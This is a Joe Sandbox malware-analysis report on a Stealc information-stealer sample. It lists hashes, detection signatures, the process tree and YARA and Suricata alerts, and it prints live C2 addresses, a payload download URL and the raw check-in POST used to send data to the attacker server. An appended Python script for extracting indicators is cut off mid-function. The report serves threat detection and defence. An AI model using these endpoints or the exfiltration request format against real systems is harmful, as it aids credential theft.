Windows Analysis Report
TP77MvSzt2.exe

Overview

General Information

Sample name: TP77MvSzt2.exe (renamed because the original name is a hash value)
Original sample name: 1e1e32d1eedb37a1e3c1ad488621b26f.exe
Analysis ID: 1542870
MD5: 1e1e32d1eedb37a1e3c1ad488621b26f
SHA1: 3896ddcb3211b9412fac2490687bdc0c1d609cc1
SHA256: c5fd02988cb7a5430c4542227ccc37e121f586ee671060f1428262af5477c319
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • TP77MvSzt2.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\TP77MvSzt2.exe" MD5: 1E1E32D1EEDB37A1E3C1AD488621B26F)
    • 9B3F.tmp.exe (PID: 5440 cmdline: "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe" MD5: 8107C38AF897D81AA4BFE8CE9CA8407C)
      • WerFault.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1076 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Yara matches (PCAP)
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0xf18:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Yara matches (unpacked PEs)
Source | Rule | Description | Author | Strings
1.2.9B3F.tmp.exe.400000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.2.9B3F.tmp.exe.b00e67.3.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.2.9B3F.tmp.exe.400000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.3.9B3F.tmp.exe.2310000.1.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
1.2.9B3F.tmp.exe.b00e67.3.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T19:08:34.605219+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 62.204.41.177 | 80 | TCP
2024-10-26T19:08:22.376374+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 104.21.56.70 | 443 | TCP
2024-10-26T19:08:23.474770+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | TCP

AV Detection

Source: TP77MvSzt2.exe | Avira: detected
Source: 00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source: TP77MvSzt2.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Joe Sandbox ML: detected
Source: TP77MvSzt2.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,1_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00407240
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00409AC0
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_00418EA0
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_00409B60
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B074A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00B074A7
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B09DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_00B09DC7
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B09D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00B09D27
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B19107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00B19107
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,1_2_00B0CA87

Compliance

Source: C:\Users\user\Desktop\TP77MvSzt2.exe | Unpacked PE file: 0.2.TP77MvSzt2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Unpacked PE file: 1.2.9B3F.tmp.exe.400000.0.unpack
Source: TP77MvSzt2.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\TP77MvSzt2.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414570
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00414910
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00B0DCE7
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00B0C0D7
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B0E077
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B01937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B01937
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B0F917
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B14107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00B14107
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00B0E697
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B0EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00B0EF87
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00B147D7
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B13B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00B13B17
Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe | Code function: 1_2_00B14B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00B14B77

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 62.204.41.177:80
Source: Malware configuration extractor | URLs: http://62.204.41.177/edd20096ecef326d.php
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Sat, 26 Oct 2024 17:08:23 GMT | Server: Apache/2.4.41 (Ubuntu) | Last-Modified: Sat, 26 Oct 2024 17:00:01 GMT | ETag: "62400-625642a987083" | Accept-Ranges: bytes | Content-Length: 402432 | Content-Type: application/x-msdos-program
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 62.204.41.177 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC | Host: 62.204.41.177 | Content-Length: 219 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------KKJKEBKFCAAECAAAAAEC Content-Disposition: form-data; name="hwid" 3E3BF36B21482604982160 ------KKJKEBKFCAAECAAAAAEC Content-Disposition: form-data; name="build" default9_cap ------KKJKEBKFCAAECAAAAAEC--
Source: Joe Sandbox View | IP Address: 176.113.115.37
Source: Joe Sandbox View | IP Address: 62.204.41.177
Source: Joe Sandbox View | IP Address: 104.21.56.70
Source: Joe Sandbox View | ASN Name: TNNET-ASTNNetOyMainnetworkFI
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.37:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 104.21.56.70:443
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.37
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00402A14
                    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECHost: 62.204.41.177Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 33 42 46 33 36 42 32 31 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 2d 2d 0d 0a Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="hwid"3E3BF36B21482604982160------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="build"default9_cap------KKJKEBKFCAAECAAAAAEC--
                    Source: TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
                    Source: TP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
                    Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exen
                    Source: TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeu
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/%
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000954000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php:Ic
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpBH
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpNH
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php_JP
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php~I
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/ows
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177;ah
                    Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                    Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                    Source: TP77MvSzt2.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                    Source: TP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                    Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE#
                    Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEO
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
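The URL rows above are strings lifted from process memory, so the same Stealc endpoint shows up several times with different trailing bytes (`:Ic`, `BH`, `NH`, `_JP`, `~I`, `;ah`) and the post-to-me.com tracking URL appears both as a format template (`?sub=`) and as the filled-in request. The script below is an added example, not part of the Joe Sandbox report: it takes rows in the shape shown above, normalizes each URL with a small set of stated heuristics (drop a fragment, drop a bare trailing `%`, keep only the host when junk is glued straight onto it, and fold a URL into another observed URL for the same host that is a proper prefix of it by at most four characters), keeps every raw variant under its canonical form, and filters the inert UPX homepage string and the WER-owned mutex. The four-character junk-tail limit, the benign-host list and the OS-mutex prefix list are assumptions chosen for this page's data, not report fields.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: rows copied from the report above, in the fused
# "Source: ...String found in binary or memory: ..." shape this page uses.
REPORT_LINES = [
    "Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.sdmpString found in binary or memory: http://62.204.41.177/",
    "Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.sdmpString found in binary or memory: http://62.204.41.177/%",
    "Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php",
    "Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php:Ic",
    "Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpBH",
    "Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.sdmpString found in binary or memory: http://62.204.41.177/ows",
    "Source: 9B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.sdmpString found in binary or memory: http://62.204.41.177;ah",
    "Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net",
    "Source: TP77MvSzt2.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=",
    "Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE#",
    "Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEO",
    "Source: C:\\Users\\user\\Desktop\\TP77MvSzt2.exeMutant created: \\Sessions\\1\\BaseNamedObjects\\48rt8k8rt4rwe5rb",
    "Source: C:\\Windows\\SysWOW64\\WerFault.exeMutant created: \\Sessions\\1\\BaseNamedObjects\\Local\\WERReportingForProcess5440",
]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+")
STRING_ROW = "String found in binary or memory: "
MUTEX_ROW = "Mutant created: "
MAX_JUNK_TAIL = 4                      # assumption: memory-string junk tails are a few bytes long
BENIGN_HOSTS = {"upx.sf.net"}          # assumption: packer homepage, not infrastructure
OS_MUTEX_PREFIXES = ("\\Sessions\\1\\BaseNamedObjects\\Local\\WERReportingForProcess",)  # assumption: WER's own mutex


def normalize_url(raw):
    """Return a cleaned URL for one memory string, or None if the host is unusable."""
    parts = urlsplit(raw)                     # the fragment ("...DE#") is discarded here
    m = HOST_RE.match(parts.netloc)
    if not m or "." not in m.group(0):
        return None
    host = m.group(0).lower()
    if m.end() != len(parts.netloc):          # junk glued onto the host ("62.204.41.177;ah")
        return f"{parts.scheme}://{host}/"    # the host is usable, nothing after it is
    path = re.sub(r"%(?![0-9A-Fa-f]{2})$", "", parts.path) or "/"   # bare trailing '%' is not an encoding
    url = f"{parts.scheme}://{host}{path}"
    return url + ("?" + parts.query if parts.query else "")


def is_root(url):
    p = urlsplit(url)
    return p.path in ("", "/") and not p.query


def collapse(urls):
    """Map each URL to the shortest observed non-root URL it extends by at most MAX_JUNK_TAIL bytes."""
    canon = sorted(urls)                      # prefixes sort before their extensions
    folded = {}
    for u in urls:
        folded[u] = u
        for c in canon:
            if c != u and u.startswith(c) and not is_root(c) and len(u) - len(c) <= MAX_JUNK_TAIL:
                folded[u] = c
                break
    return folded


def extract_iocs(lines):
    raw_by_norm = defaultdict(set)
    mutexes = set()
    for line in lines:
        if MUTEX_ROW in line:
            name = line.split(MUTEX_ROW, 1)[1].strip()
            if not name.startswith(OS_MUTEX_PREFIXES):
                mutexes.add(name)
        elif STRING_ROW in line:
            for raw in URL_RE.findall(line.split(STRING_ROW, 1)[1]):
                url = normalize_url(raw)
                if url and urlsplit(url).netloc not in BENIGN_HOSTS:
                    raw_by_norm[url].add(raw)
    folded = collapse(raw_by_norm)
    urls = defaultdict(list)
    for norm, raws in raw_by_norm.items():
        target = folded[norm]
        while folded[target] != target:       # follow a fold chain to its end
            target = folded[target]
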